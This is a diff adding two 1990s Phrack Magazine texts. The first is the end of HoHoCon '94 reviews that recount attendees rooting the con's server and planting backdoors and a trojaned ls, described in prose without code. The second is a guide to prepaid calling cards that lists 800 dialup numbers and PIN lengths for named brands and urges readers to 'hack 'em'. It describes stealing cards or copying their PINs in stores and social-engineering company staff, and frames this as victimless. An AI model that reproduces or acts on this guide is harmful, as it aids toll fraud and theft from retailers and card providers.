+account, password bin, and use lprcp to put it back in /etc/passwd. (copies of
+his .bash_history should be available on fool's ftp site by the time you read
+this...see below)
+
+DjRen and I, in the meantime, were out of the room having a small party for
+ourselves, so I didn't get a chance to see all this happening.  Apparently
+nobody discovered it until y started wall'ing message about his eliteness
+and also started bragging to everyone on irc about it.  When Dj and I returned,
+we discovered that X had managed to an account for himself on the system.
+X installed his own backdoors into the system and started playing
+around.  At this point, I wasn't really fully aware of what was going on
+because of the buzz I had from that New-Years-Day bottle of champagne
+graciously delivered to us by an interesting Australian writer at the
+conference.
+
+Finally, Dj and I returned to the computer room, where I sat down at a terminal
+to IRC a little, and I heard a big commotion about how y had hacked root :)
+About the same time, y was on irc attempting to play netgod because he hacked
+hohocon.org :)
+
+Apparently even Mike got access to the system at one point, but it is not
+clear if he did anything once he was there.  The people sitting at the
+hohocon.org consoles then began a massive scramble to kick them out of the
+system.   Several times they were killed, but Y and X kept coming back.
+fool managed to find some of the accounts they had created, and I managed to
+hear the root password from among the commotion and I logged in to kill inetd
+keep them from being able to connect in.  I then proceeded to do a find for
+all the suid programs, where I found a couple of x and y's backdoors (the
+oh-so-elite /usr/bin/time sure had me ph00led, y :)
+
+After I removed the backdoors I could find, I looked at /etc/motd, and noticed
+y's message:
+================================================
+Spock rules more than anyone
+
+WE SWEAR
+
+
+WELCOME SOUTH EASTERN POSSE TO HOHOCON!@#$
+================================================
+I don't think I really have to make any comment about this message, it is
+clearly self-explanatory :)
+
+Thinking I could be elite too, I replaced his message with
+================================================
+
+
+Loq has defeated X and Y :)
+
+
+================================================
+
+Photon came in the room, and started working on getting the systems back
+together... That was the conversation where we coined the phrase the
+"Hohocon Emergency Response Team (HERTz)".
+
+About half-an-hour later, Eclipse ambled into the room telling me to
+login again...I do and somehow Proff had managed to get root access and
+add a line into the motd:
+
+================================================
+
+
+Loq has defeated X and Y :)
+And proff has defeated Loq.
+
+
+================================================
+
+I started to look around a little and suddenly it looked like all the files
+were missing... When I did an ls / I realized that Proff has replaced ls
+with his own  copy that wouldn't show any files :)  So for awhile, I had
+to do echo *'s just to get lists of files in the directories.  At that point,
+I really didn't want to play the games anymore, as it was about 2am and I had
+to work at 8am that morning, but I congratulate Proff in being
+able to defeat all of us that one last time :)
+
+The rest of the con, with respect to the network, was pretty quiet...
+For those interested, most of the hohocon logs and information will be on
+fool's ftp site: ftp://dfw.net/pub/stuff/FTP/Stuff/HoHoCon
+
+The list of users that were finally on Hoho was pretty large, here is a copy
+of all the accounts that existed on hohocon.org at the time it went down:
+
+root bin daemon adm lp sync shutdown halt mail news uucp operator games
+man postmaster ftp fool yle djren mthreat shaytan loq mindV klepto btomlin
+nnightmare train patriot fonenerd joe630 plexor pmetheus vampyre phlux
+windjammer nocturnus phreon spock phred room202 novonarq thorn davesob
+f-christ gweeds cyboboy elrond onkeld octfest tdc mwe angeli Kream ljsilver
+marauder landon proff hos fool cykoma dr_x el_jefe mwesucks iceman eric
+z0rphix
+
+
+Other miscellaneous notes....
+
+Thanks to fool for organizing as much as he did in such limited time.
+ It sucks that the first hotel had to cancel and that caused
+ us to lose our ISDN link...Hopefully next year I will be able
+ to provide the link for you.
+
+Thanks to photon for getting the PPP link up and running...it disconnected
+ many times and became really slow when the load finally came down
+ on it, but overall it worked extremely well with few problems.
+
+Thanks to micro^[[ for the idea of trying to bounce the telnets around the
+ world in the normal hacker tradition...
+
+Thanks to eclipse for the interesting conversations and for giving me a
+ better understanding of Proff... :)
+ A small note that Eclipse discovered:
+  "To Root: (slang) To have sex..."
+
+ ahh...no wonder all those people sit on the net on friday nites :)
+
+Thanks to Proff for the extra entertainment at the end of the nite... I
+ look forward to battling you in the future :)
+
+Also thanks to X and Y for the entertainment as well :)
+
+Finally, thanks to both fool and eclipse for helping me review this text and
+ get it somewhat accurate at least :)
+
+I am intentionally leaving everyone else's names off of here because I
+know I would forget someone that I met at hohocon, and I wouldn't want to
+cause hurt feelings or anything :)
+
+-----------------------------------------------------------------------------
+
+                   Bits and Bytes Column by J. Barr
+                     (From Austin Tech-Connected)
+
+
+WaReZ <nOun>  1.  Stolen software available to 'elite' callers on
+'elite' bulletin boards.  2.  Pirated or cracked commercial
+software.
+
+HoHoCon is Austin's annual celebration of the computer
+underground.  Phreaks, phracks and geeks rub shoulders with
+corporate security-types, law enforcement officials, and various
+and assorted cyber-authors.  It's an in thing, a cult thing, an elite
+thing. In many ways it reminds me of the drug-culture of the 60's
+and 70's.  It has the same mentality:  paranoia and an abiding
+disdain for the keepers of law and order. But after all, HoHoCon
+honors the Robin Hoods of the computer era: stealing from the
+rich, powerful, and evil prince (Microsoft, IBM, Lotus, et al) and
+distributing to poor dweebs under the very nose of the sherrif.
+A nose, by the way, that just begs to be tweaked. That's the
+romantic notion, at least.  To others there is no nobility in
+computer crime.  Whether it's a case of wholesome anarchy run
+amok or youthful pranksterism subverted to common criminal
+mischief: warez is warez, theft is theft.
+
+A month or two ago I had an email conversation with a young
+man and we discovered we both ran BBS's. He asked what my
+board was about and I explained that The Red Wheelbarrow)
+was for 'rascals, poets, and dweebs', and that it carried echos
+from FidoNet, USENET, and elsewhere.  He replied that his was
+a private board, one that dealt mainly in "WaRez and 'bOts" and
+closed his note with an "eVil gRin."   Not being sure what he was
+talking about, I asked him to spell it out for me.  I never heard
+from him again.
+
+I mention this because at HoHoCon you either knew these
+things or you didn't; you were part of the elite or you were not.
+Like my questions to my friend the pirate board operator, my
+questions at HoHoCon went unanswered.
+
+The hype in various  Austin newsgroups for this year's event
+talked quite a bit about the party last year.  Cyberspace
+luminaries shared top billing with the mention of teenage girls
+stripping for dollars in a hotel room.  I decided then and there it
+was the sort of function I should cover for Tech-Connected.
+
+I asked at the door for a press pass and was directed towards a
+rather small redheaded kid across the room. The guard at the
+door said he (the kid) was running the show.  I expected to see
+lots of people I knew there, but  I only saw one. John Foster is
+the man who keeps the whole world (including Tech-
+Connected) up-to-date as to what boards are up and what boards
+are down in Central Texas. John is about my age.  He looked
+normal.  Everyone else was strange.  I saw more jewelry in
+pierced noses and ears walking across that room than I normally
+see in a week. Lots of leather and metal, too.  HoHoCon '94
+looked like where the tire met the (info) road: a cross between
+neo-punk-Harley-rennaisance and cyber-boutique. Most of the
+crowd was young.  Old gray-beards  like John and I really stuck
+out in the crowd.
+
+I found the redheaded kid. He was selling t-shirts at the table.
+Next to him an "old hand" (who must have been nearly 30) was
+reciting the genesis of personal computers to a younger dweeb.
+They quibbled for a second about which came first, the Altos or
+the Altair, then looked up to see if anyone was listening and
+smiled when they saw that I was.  I waited respectfully for the
+redheaded kid to finish hawking one of his shirts, then repeated
+my request for a press pass.  He just looked at me kind of funny
+and said he had given some out, but only to people he knew.  I
+didn't know a secret handshake or any codewords I could blurt
+out to prove I was cool, so I just stood there for a moment and
+thought about what to do next.
+
+Perhaps a change in costume would make me cool.  Maybe then
+these kids could see that I was OK.  I picked up a black one, it
+read NARC across the front and on the back had a list of the top-
+ten NARC boards of 1994.  Not wanting to appear ignorant, I
+didn't ask what NARC stood for.  I figured it would be easy
+enough to find out later, so I bought the shirt and left.
+
+I returned Sunday morning, wearing my new NARC t-shirt,
+certain it would give me the sort of instant-approval I hadn't had
+the day before.  It didn't.   As I was poking around the empty
+meeting room, a long-haired dude in lots of leather came
+clunking up in heavy-heeled motorcycle boots and asked what I
+was doing.  I explained I was there to do a story. That shut him
+up for a second so I decided to pursue my advantage.  "Anything
+exciting happen last night?" I asked.  "Nothing I can tell YOU
+about, SIR" he replied, then pivoted on one of those big heels
+and clunked away.
+
+Browsing the tables in the meeting room I found pamphlets left
+over from the previous day's activities.  There was an old
+'treasure map' of high-tech 'trash' locations in Denver. Northern
+Telecom, AT&T and U.S.West locations seemed to be the focus.
+There were flyers from Internet access providers (it seemed a
+little like carrying coals to Newcastle, but then what do I know), a
+catalog from an underground press with titles like "The Paper
+Trail" (just in case you need to create a new identity for
+yourself), "Fugitive: How to Run, Hide, and Survive" and
+"Secrets of Methamphetamine Manufacture." Good family
+reading, fer shure.
+
+For the purists there were reprints of issues 1 to 91 of
+"YIPL/TAP", the first phreak newsletter.  For the wannabe's like
+me, there were more kewl t-shirts to be ordered.  I decided I
+should have opted for the one with "Hacking for Jesus" across
+the back. I appreciate the art of anthropology a little more after
+trying to read the spoor left behind at HoHoCon.  It is definitely
+a mixed bag.
+
+To this day, I'm not certain what NARC stands for.  Someone
+suggested it was any state or federal officer interested in busting
+people, just like in the bad old days (or today, for that matter).
+Maybe it's shorthand for aNARChist. The definition I like best
+was given to me on an internet newsgroup,  alt.binary.warez.pc.
+(Really, it exists right there in front of the Secret Service and
+everyone.)  One reply actually had an answer. After a paragraph
+or two of the requisite 'my gawd what a stupid question from a
+know-nothing nerd',  the suggestion was made that it stood for
+"Never At Rest Couriers."
+
+I like that one because it suggests a purpose for those 'bots my
+friend with the WaReZ board and the eViL gRiN mentioned in
+our conversation.  Sitting in private channels on IRC servers,
+'bots could be used to store and forward pirated goods across the
+internet in almost untraceable ways.  Who knows for sure?  Not
+I.  One thing I'm certain of, I'm real careful what part of town I
+wear my NARC t-shirt in.  I would really hate getting shot by a
+confused crack-cocaine dealer who thought my shirt was the
+signal his deal had gone bad.
+
+Because I had been excluded from the inner circle, because I
+had tried and failed to become part of the elite during HoHoCon,
+it was easy for me to work myself into a morally superior position
+from which to write this column.  All I had really seen were a
+bunch of kids: wannabe's, cyber-groupies and counterculture
+alternatives to life-as-we-know-it, celebrating the triumph of
+crooks and petty thieves over legitimate big business and big
+government.  But something bothered me about that safe, smug
+position, and the more I thought about it the more it irked.
+
+For one thing, something was missing. If they were criminals,
+where was the loot?  Where were the Benz and BMW's that
+should have been in the parking lot?  Where were all the fancy
+wimminz that follow fast money?  Software prices are high these
+days, so even if they were only getting a dime on the dollar for
+their WaReZ, there should have been some real high-rollers
+strutting their stuff.
+
+A reformed phreaker gave me some input on this.  He said it was
+about collecting a complete set, like trading baseball cards, not
+about making money.  The software itself wasn't  important.
+Having it in your collection was the important thing. Tagging in
+cyberspace.  Making a mark by having one of everything. But
+still, it's illegal.  Against the law, whether for profit or not.
+
+The news background as I write this story is about Microsoft,
+king of the PC software hill.  The judge reviewing the Consent
+Decree negotiated between the Department of Justice and
+Microsoft is angry with the lawyers from Redmond.  He tells them
+that he can't believe them any longer.  They testified in
+September that Microsoft did not engage in marketing
+vaporware, which is an old IBM tactic of hurting the sales of a
+competitor's product by promising they would have one just like
+it, and better, real soon now.
+
+The judge has before him internal Microsoft documents which
+indicate that the employee who came up with the idea of using
+vaporware to combat new products from Borland was given the
+highest possible ranking in his evaluation. The tactic apparently
+worked to perfection. The suits have now told the judge it wasn't
+vaporware, because Microsoft was actually working on such a
+product.  The judge is not amused.  Are these crimes, this
+dishonesty, somehow more acceptable because they are done
+for profit by an industry giant?  Because they're done by
+business men in suits instead of punk kids in jeans?
+
+How about Ross Perot's old company, EDS.  Have the once
+proud men and women of the red (tie), white (shirt), and blue
+(suit) drifted astray since the days when 'the little guy' insisted
+that not even a hint of impropriety was acceptable?  The state
+employee that negotiated and signed the contract with EDS that
+brought me to Austin in 1990 to install the statewide USAS
+accounting system for the State Comptrollers Office was hired by
+EDS as a 'special consultant' in 1992.  Hint of impropriety? This
+was shouted from the roof-tops.  EDS bought a full-page ad in the
+Austin American-Statesman to make sure that all the other
+bureaucrats in state government got the message.
+
+What about the cops?  The federal storm-troopers who
+conducted the raids around town at the time of the Steve Jackson
+affair.  The judge at that trial had dressed down the agent in
+charge like he was talking to a teenage bully who had been
+busted for taking candy from the other kids. No wonder the EFF
+(Electronic Frontier Foundation) is so popular.  It's the ACLU of
+the 90's and the uncharted terrain of cyber-space.
+
+Finally, how about me.  I have the illegal software on my PC.  It's
+a copy of Personal Editor II that I've had forever.  When I
+worked at EDS I once had to code 250,000 lines of COBOL
+using EDLIN. In those days, management didn't think PC's were
+anything but toys and they would be damned before they spent
+any money buying editors to write software for them.  Out of that
+ordeal came an abiding disdain for EDLIN and my own copy of
+PE II.  I'm not sure where I got it.  It was a legal copy at one
+time, though I'm not sure whose it was. When I transferred to
+Washington, D.C. in 1987, I took it with me.  I moved it from my
+XT, to my AT, to my 386SX. Now it's own my 486DX2/50.  I had
+a copy of it on every computer I used at work. I used it for
+everything I coded, for all the notes I wrote.
+
+These days I don't go into DOS unless I want to hear the guns
+fire in Doom II. OS/2 comes with TEDIT, which looks enough
+like an updated version of PE II to make me feel guilty every
+time I see it.  But I haven't taken the time to learn how to use this
+legal editor.  My taboo copy of PE II is much too comfortable.
+
+So who are the good guys and who are the bad?  The suits who
+steal and bribe and leverage from within the system?  The
+arrogant thugs with badges?  The punks with body-piercings?
+Or an old phart like me, with illegal software on my own PC?
+Heady questions for sure.  I thought I knew the answer when I
+started this column, now I'm not so sure. I can't condone the theft
+of goods or services no matter how altruistic or noble the cause,
+or how badly some noses need to be tweaked, or how ignoble
+some agents of law enforcement.
+
+I think it would be my style to point a finger first at the suits,
+then at the kids.  But as long as I'm using stolen software, or
+'evaluating' shareware long after the trial period is over, I don't
+have to go very far should I get the urge to set something right.
+
+
+-----------------------------------------------------------------------------
+
+                         Ho Ho Con '94 Review
+
+                by Onkel Dittmeyer (onkeld@netcom.com)
+
+
+    " If I would arrest you, you would really be under arrest,
+      as I am a real officer that can actually arrest people who
+      are under arrest when I arrest them. "
+                                   - Austin Cop, HoHoCon '94
+
+
+    For those who missed it, dissed it or were afraid to go, here
+comes my very personal impression on HoHoCon 1994...flames: /dev/null.
+
+    Drunkfux did it again. K0de-kiddiez, WaReZ-whiners, UNIX-users,
+DOS destroyers, linux lunatics - all of them found their way to the
+Ramada South Inn in Austin, Texas to indulge in a weekend of excessive
+abuse of information equipment and controlled substances under
+supervision of the usual array of ph3dz, narqz, local authorities,
+mall cops and this time - oh yes! - scantily clad Mexican nationals
+without green cards in charge of hotel security. Tracy Lords, however,
+did NOT show up.
+
+                               (I want my money back.)
+
+    Well.
+
+    When I walked into the hotel, I noticed a large handwritten
+poster that Novocaine put up in the lobby, marking his room as a
+"hospitality suite" for those who already made it to Austin Thursday
+night. I ditched my bags into my room and went up to the fifth floor to
+see what was going on, and who was already there. Grayareas, Novocaine,
+Eclipse, Dead Vegetable and a bunch of unidentified people were
+lingering around a table that was cluttered with all kinds of
+underground mags (from 2600 to Hack-Tic), some reading, some making up
+new conspiracy theories. Everybody took a good whiff of Austin air and
+prepared themselves for the action to come. Later that night, I took
+Commander Crash for a walk around the hotel to see how well they did
+their homework. The rumor was that the hotel had been notified, as well
+as all local computer-oriented businesses, that the haqrz were in
+the neighborhood.. and it looked like it was telling the truth. We
+found not a single door unlocked, not one phone interface un-secured.
+Somebody closed all the security h0lez in advance, therefore hacking
+the hotel looked pointless and lame. Everybody crashed out,
+eventually. For most, it was the last sleep they would get for the new
+year's weekend.
+
+    Noon the next day, I awoke to find the lobby crawling with
+people, and ran into some familiar faces. Like last year, most of the
+lobby-ists were playing with hand-held scanners. The National Weather
+service was soon declared The Official HoHoConFrequency, and was - in
+old fashion - blaring through all hallways and lounges of the site. At
+least, nobody could claim they didn't know it was going to rain...
+
+    Commander Crash approached me in the early afternoon. "Dude, "
+he said, "I think I've got a bug on my scanner..". We went hunting
+around the hotel with a signal-strength-indicator-equipped eleet
+scanner to see if we could locate the little bastard. We couldn't.
+Disappointed, we asked some cDc guys to help us look, and soon we
+walked up and down the hallways in a mob of approximately fifteen to
+twenty people. An "undercover" hotel security guard, clad in a "beefy
+look" muscle-shirt that revealed some badly-sketched tattoos walked up
+and advised us to "get our asses back to our rooms". "If there is a
+bug in this hotel, it is there for a reason. Therefore, don't mess
+with it." I asked him if we were grounded or something. He was kindly
+ignored for the rest of the night. As the mob settled into the
+check-in lounge, I noticed about half a dozen new security guards who
+were hired to enforce Law & Order and just received an extra briefing
+from the hotel manager in a back room. An Austin cop proceeded giving
+each one of them an extra pair of handcuffs.  Somebody exclaimed "My
+Lord, it's gonna be bondage-con!", which caused me to spray my soda
+over an unsuspecting warez d00d. He called me a "LaMeR" and chased me
+back to my room where I peacefully lost consciousness.
+
+    The next morning, I awoke late while the actual con was already
+in full swing. I pumped myself back into reality with a handful of
+Maximum Strength Vivarine(TM) (thank god for small favors) and moved
+my not-too-pleasant-smelling likeness into the con room, where
+Douglas Barnes was in the middle of a rant on basic encryption. Very
+basic, so to speak. Maybe because, like he said, he did not know "how
+to address such a diverse audience consisting of hackers, security
+professionals and federal agents". Hmpf! You fill in the blanks. Next
+up was Jeremy Porter, going into the details of available digital cash
+systems, and repeatedly pointing out how easy you can scam over
+NetCash by faxing them a check and then cancelling it out after you
+got your digicash string in the (e-) mail.  Up next, Jim McCoy gave a
+talk on underground networking, a concept that enables you to run a
+totally transparent and invisible network over an existing one like
+the Internet. Very much like the firewall at whitehouse.gov..
+
+    Damien Thorn was next, starting with some video footage he taped
+off a news station where he is interviewed on cellular fraud through
+cloning.  He also showed off a nice video clip that showed him playing
+around with ESN grabbers an other quite k-rad equipment.  Ironically, he
+chose "21st Century Digital Boy" from Bad Religion as the underlying
+soundtrack.  That reeks of pure K-RaDiCaLnEsS, doesn't it? When dFx came
+back to the mike, about 400 ranting and raving haqrz demanded for the
+raffle to finally start, and the k-g0d (who wore a pair of weird,
+green, pointed artfag boots) gave in. In the next thirty minutes or
+so, a lot of eleet things found new owners like hard drives,
+keyboards, twelve hour well-edited hotel porno videos, HoHoCon videos,
+back issues of 2600 and TAP, a whole lot of HOPE t-shirts, a
+Southwestern Bell payphone booth, CO manuals and other dumpster-diving
+loot, AT&T Gift Certificates, an eleet 600 bps modem, and lots of
+other more or less useful gadgets. Dead Vegetable repeatedly insisted
+that he was not giving up the 35-pound "Mr. T." head he brought, which
+was made of solid concrete and hand-painted. "No, it's a Mr-T-Phone,
+you can pick up the mohawk and talk!"
+
+    Back out in the lobby, I ran into erikb and chatted briefly
+about some other Europeans we both knew (Hi 7up..)..  On the way
+up to my room, I stopped at the 2nd floor lobby to mock somebody
+for cigarettes. Well, see, I don't have anything against a huge
+flock of ph3dz taking up the whole lobby, but if not a single one
+of them smokes, let alone has a ciggy to spare, it pisses the fuck
+out of me.  Back down, I crammed some fliers into my bag (Buy HoHoCon
+videos/TAP issues/2600 subscriptions and other sellout), chatted with
+Ophie and a couple of other IRC babes (a lot of females at the con
+this year, if this trends keeps up, it will look like a Ricky Lake
+show at next year's HoHoCon) and retreated back to my room to secure
+all the nifty things I won at the raffle (a book of TAP issues,
+a 2600 issue, two t- shirts, an acoustic coupler.. dFx looked
+quite pissed).
+
+    Back down, everybody that had something to sell had opened up
+shop. dFx was selling last years "I LOVE FEDS/WAREZ" tee-shirts plus
+a new stack of the elusive "I LOVE COPS" baseball caps, who came
+in four different spanking colors this year. The embroidered logo is
+the clincher. I can just recommend everyone who did not get one yet
+to get their hands on one of these (no, I am not receiving any ca$h
+for this). Netta Gilboa was auctioning off some back issues of
+Gray Areas, and cDc sold everything from sizzling "Cult of the Dead C0w"
+shirts and hats to "Please do not eat kids" stickers, cable TV descramblers
+and DTMF decoders while happily zonking away on an old Atari 7800
+video game.  While browsing through the merchandise, I ran into a guy
+with a shirt that said "I quit hacking, phreaking, k0dez and
+warez.....it was the worst 15 minutes of my life." Now THAT
+would have been something to bring home! I blew my excess money on
+some less original shirts and visited Room 518, where a bunch of
+dedicated people had set up a Net connection and public-access
+terminals. Some of the TTYs definitely looked like something you would
+find if you decided to take a walk around the desolate offices of your
+local CO at night..
+
+    Midnight drew closer. When the new year came around, I was quite
+shocked.  "Hey d00dZ! Happy New Year!" - "Shut Up!  I am about to get
+op on #warez2!"  What a festive mood.  After midnight, everybody pretty
+much retreated into a room with a fair quantity of their favorite
+narcotic substance (the 4th floor was filled with an ubiquitous pot
+smell, despite of the alarming presence of suits who were talking into
+their jackets) and called it a day.
diff --git a/phrack47/13.txt b/phrack47/13.txt
new file mode 100644
index 0000000..ccd7bb0
--- /dev/null
+++ b/phrack47/13.txt
@@ -0,0 +1,554 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 13 of 22
+
+
+                             Final : [o2/xx]
+
+                 /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
+           .xX- | - An Overview Of Prepaid Calling Cards - | -Xx.
+                 \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
+
+                          '95 - Second Update - '95
+
+              - Second -BTR- Release - First -PAiN- Pak Release -
+
+                           (c) 1995 Treason [518]
+
+                                    by
+
+                           treason@fpg.gcomm.com
+
+- . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . -
+           With A Special Thanks Going Out To Al K. Lloyd [4o4]
+                  My Partner In Krime In The PCC World
+- . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . -
+         And Another Thanks Out To Me Bud Antediluvian [4o4]
+                 For Enjoying PCCs And Knowing Some Too
+- . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . - - . -
+
+In the past few months or so I have noticed that most places are
+hopping on the Prepaid Calling-Card (PCC for short) bandwagon. PCCs
+are a cheap alternative to normal long distance. (Or are supposed to be.)
+For all of you that don't have any idea what a PCC is or how it works, here's
+the full info:
+
+Prepaid Calling-Cards are cards shaped like normal calling cards
+and look exactly like them.  On their back, all PCCs have a 800 dialup,
+a 9-12 digit code (give or take a few digits) and a customer service number
+to report trouble.  All of these are sold in such a fashion that nosy phreaks
+can't just read the backs and call the dialup and use it, without buying them.
+
+PCCs almost always have calling limits.  Most available in the US are only
+good within the US or US territories.  With certain cards, you have the
+option to dial international but this will give you about 1-2 minutes of
+actual usage on a 10 minute card, so I don't recommend calling Int'l
+with these.  There are a few more restrictions blocking calls to any SAC.
+(Special Area Code, like 700, 800, 900)  Domestic dialing is about all you
+can do and still get your money's worth.  To sum it up, a PCC has a slotted
+amount of time or dollar amount to use.  As far as getting a good deal goes,
+you can't:  you break even, or you get ripped off.
+
+
+PCC's are very easy to find.  They tend to turn up in the oddest
+places.  You don't even have to look hard; they just pop out with banners,
+signs and other various ads, so they are not hard to find. Some places
+where I have found them are:  most grocery stores, some Toy Stores,
+Greeting Card Shops, Quickee Marts, in packs of Sports cards and even at
+Sporting good stores.
+
+I thought this would be a particularly useful topic to write about due
+to the fact anybody can benefit from these.  However, I'm not talking about
+going to the store and buying them.  It doesn't take a genius to figure out
+what to do with them.  They run a very simple system so anybody can use it.
+(I mean, how hard is it to enter your digits when instructed?)
+
+Most of these cards are basically copycats of each other.  They all have
+some deal with a big long distance company.  After you enter the valid
+number they tell you how much time is left on you card.  They all have an
+operator that comes on just to tell you when 1 minute is left on your card.
+(BTW, that fucks up any modem connection).  Plus, all of these services
+run 800 numbers and are open 24 hours a day, 7 days a week.  Last but
+not least, these don't show up on your phone bill.
+
+Some people are set on never using stolen codes. (*cough*Emmanuel*
+Goldstein*cough*cough)  But this is different since you're not really
+stealing from any person by taking these.  You are not putting some
+middle-class people from the Burbs out $20,000 like an abused calling card
+that was passed around could.  So it's really not bad; besides, everybody's
+doing it!
+
+Hack 'em, Crack 'em, LD Pack 'em. Steal 'em, Deal 'em, Conceal 'em.
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+There's a new company called Talk 'N Toss.  They are offering a huge
+variety of PCCs to chain stores that would buy a large amount for their
+numerous stores.  Once a large company buys into this, they get set lines to
+use for their card.  Then they customize them for their company name and
+plugs.  I have seen Talk 'N Toss (TNT) sell 5, 10, 20, 30, 50, 80, 90 and 180
+minute cards.  If you get a 90 minute card (or longer) that's the real jackpot.
+90 Minutes is the largest minute card I have ever seen them selling.
+If you wish to place an order to sell them at "your" business, dial their
+customer service hotline toll-phree at [800] 631-8895.  Plus I'm sure you
+can SE the lady into getting free cards.  (I've done it once so I know that
+it can be done.)  They claim that you save up to 38% from a normal AT&T
+Call Card.  Bullshit maybe, but who the fuck knows.
+
+I have seen these selling only two places.  The first is a grocery store
+in Colorado (719 NPA) called Albertson's.  I don't know if this grocery
+store is only located in Colorado, but that's where I happened to run into it.
+I do not know the dialup or the proper amount of digits for this card.
+It only sells in intervals of 30 and 90 minutes.  This is one of the few
+cards with which you can call international.  For example, when calling
+international they say that $1 of what you paid is equal to 3 LD minutes,
+or about half a international minute...RIPOFF!
+
+The other place I have seen TNT cards is Revco drugstore (formerly
+Brooks Drugs.)  They have 10 minute card for $3.99 and a 20 minute card for
+$9.99, 30 minutes for $14.99 and finally a 90 minute phone card goes for
+a whopping $24.99.  Deal or not?  You decide.  If you decide you won't pay
+for this crock of shit call 'em and hack 'em! At [800] 213-0304
+with 10 digit PINs for their cards.  The time amount doesn't change the digit
+amount. They have a CS number through which you can SE employees or just
+complain to them at: [800] 354-2708.
+
+Hello Direct, the phone supplies company, is offering their version
+of TNT's PCC called the Prepaid Phone Card (PPC).  They're identical models
+to the Revco TNT cards.  The dialup is [800] 955-2383 and the PINs are 9
+digits.  These cards are the real jackpot with 180 minute cards for $50,
+80 minutes for $29 and 50 minute cards for $18.  These are by far the
+best deals around.
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Marvel Comics and Kay-Bee have put their heads together and are now
+offering X-Men PCCs.  There's 2 things you can do with these cards.  The first
+option you have is use it for 20 minutes of long distance (no international.)
+The second option is to play some stupid X-Men game.  The game uses 4 minutes
+(or units, as they call them) of your card.  You start with 20 units,
+with each unit equivalent to 1 minute.  Basically the hot idea they have
+to sell these is 4 different cards, each with supposedly famous X-Men 1 on 1
+battle scene.  Plus they claim they are a limited edition.  Yeah, they may
+be a limited edition but so is Phrack.  They have taken a little more security
+than other cards by having a scratch off number on the back, so you can't
+just pop off the outer plastic and see the PIN.  I find these to be some of
+my favorite PCCs to use because you have 20 minutes, which is fairly decent,
+plus they are easy to swipe.  I just go to my Kay-Bee toys and take a bunch
+to the back and open them, and either steal the card or write down the number
+and hide the card.  In a sick way, I find writing down the number more fun
+because when someone finds it and thinks that they are hot shit by stealing
+it they'll run into a nice message saying that they have no time left and
+they can't do shit with it.  To further experiment call [800] 616-8883.
+The cards are 9 digits long.
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Champs Sporting Goods Store has a new deal whereby if you purchase over
+$35 worth of sports shit you get a card for a free 7 minute call.  Technically,
+it ain't free since you're buying merchandise.  Seven minutes basically ain't
+worth your time, but if you can get it for free it's worth every minute.
+You can usually get some dumbass clerk to let you look at the cards because
+they keep them on the cash register.  One lady said to me, "Now don't pocket
+that," as I was putting it into my pocket...oh well, dumbass.  The
+number is [800] 437-6404.  With 9 digits for your PIN.
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Randomly inserted into Classic 4-Sport sports cards are Sprint Prepaid
+FoNCARDS.  Classic Games have joined with Sprint for numerous deals, this
+being one.  Classic 4-Sport is a pack of sports cards that depict players
+going to the pro's next year for 4 different sports. Those sports are
+Baseball, Football, Basketball and Hockey.  Now, what the fuck would some
+baseball card collector do with a Prepaid Foncard?  I still haven't figured
+it out.  But some dealers tell me it's just another marketing thing because
+collectors think they're a limited edition.  The cards are only worth $2
+of LD anyway.  While the odds of finding a Sprint FoNCARD is 1:72.
+(Which means 1 out of every 72 packs).  I know very little about this
+since I haven't seen much out of them.  They do have a scratch off PIN on
+the back.  To collectors, if the card has been scratched then the card
+looses half of it's "value."  OOOOh scary.
+
+Classic is trying to offer something to the collector again.  But
+this time it's about real money.  Not opening a $1.50 pack of cards.  They're
+now offering 1, 5, 10, 20 and 1000 dollar cards to dealers.  These are such a
+hot commodity that the prices double every quarter!  I asked some ripoff
+artist what the deal was on getting the cards.  He said that for a $1000
+card you must pay a $750 down payment with a max order of 1.  On other
+styles you have to order 18 cases to get them wholesale.  That's 108 total
+cards.  I'm sure you can find them singular.  Try looking in your local
+sports page for ads for Sportscard conventions...at those you can swipe them.
+
+To fuck around with these, call up [800] 868-9871 with 10 digits to
+get a set amount of time.
+
+  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+        Sports fans listen up once again. GTE is offering 25 minute PCCs
+that look like actual calling cards. But with these cards you can order a PCC
+with a professional football team logo and helmet located on the front of it. They call these
+"NFL Collectables" they are called. But the minimum order is 2 cards. Plus
+with each order you get sent a 5 minute bonus card that features helmets from
+all 30 NFL teams on it. To order each card is only $14.75 but you have to get
+2. Call 1-800-GTE-3804 in the US. And outside the US call [303] 743-4138,
+extension 712. Or just fax your order to [303] 727-4994. You must order these
+with a credit card. I saw this add in Sports Illustrated.
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+This next one I would call my first love because it's what directed my
+attention to the Prepaid Calling-Card field.
+
+Hallmark is also working with Sprint to rip you off for that special occasion.
+They started out printing normal greeting cards. (ie:  Happy Birthday,
+Get Well, When Will You Finally Get Laid, etc...)  But then they got more
+specific with their Christmas PCCs.  Now Valentine's Day is nearing and they
+are selling Valentine's PCCs.  All of these cards are $5.95 for the card and
+have 10 minutes of LD.  You can call anywhere in the US and its territories
+(Virgin Islands, Puerto Rico), but no Int'l.
+
+The main reason I fell in love with these is because of their mass
+availability.  I have millions of Hallmarks in my area, and these cards are
+easy to get for free.  These are greeting cards you just open like a normal
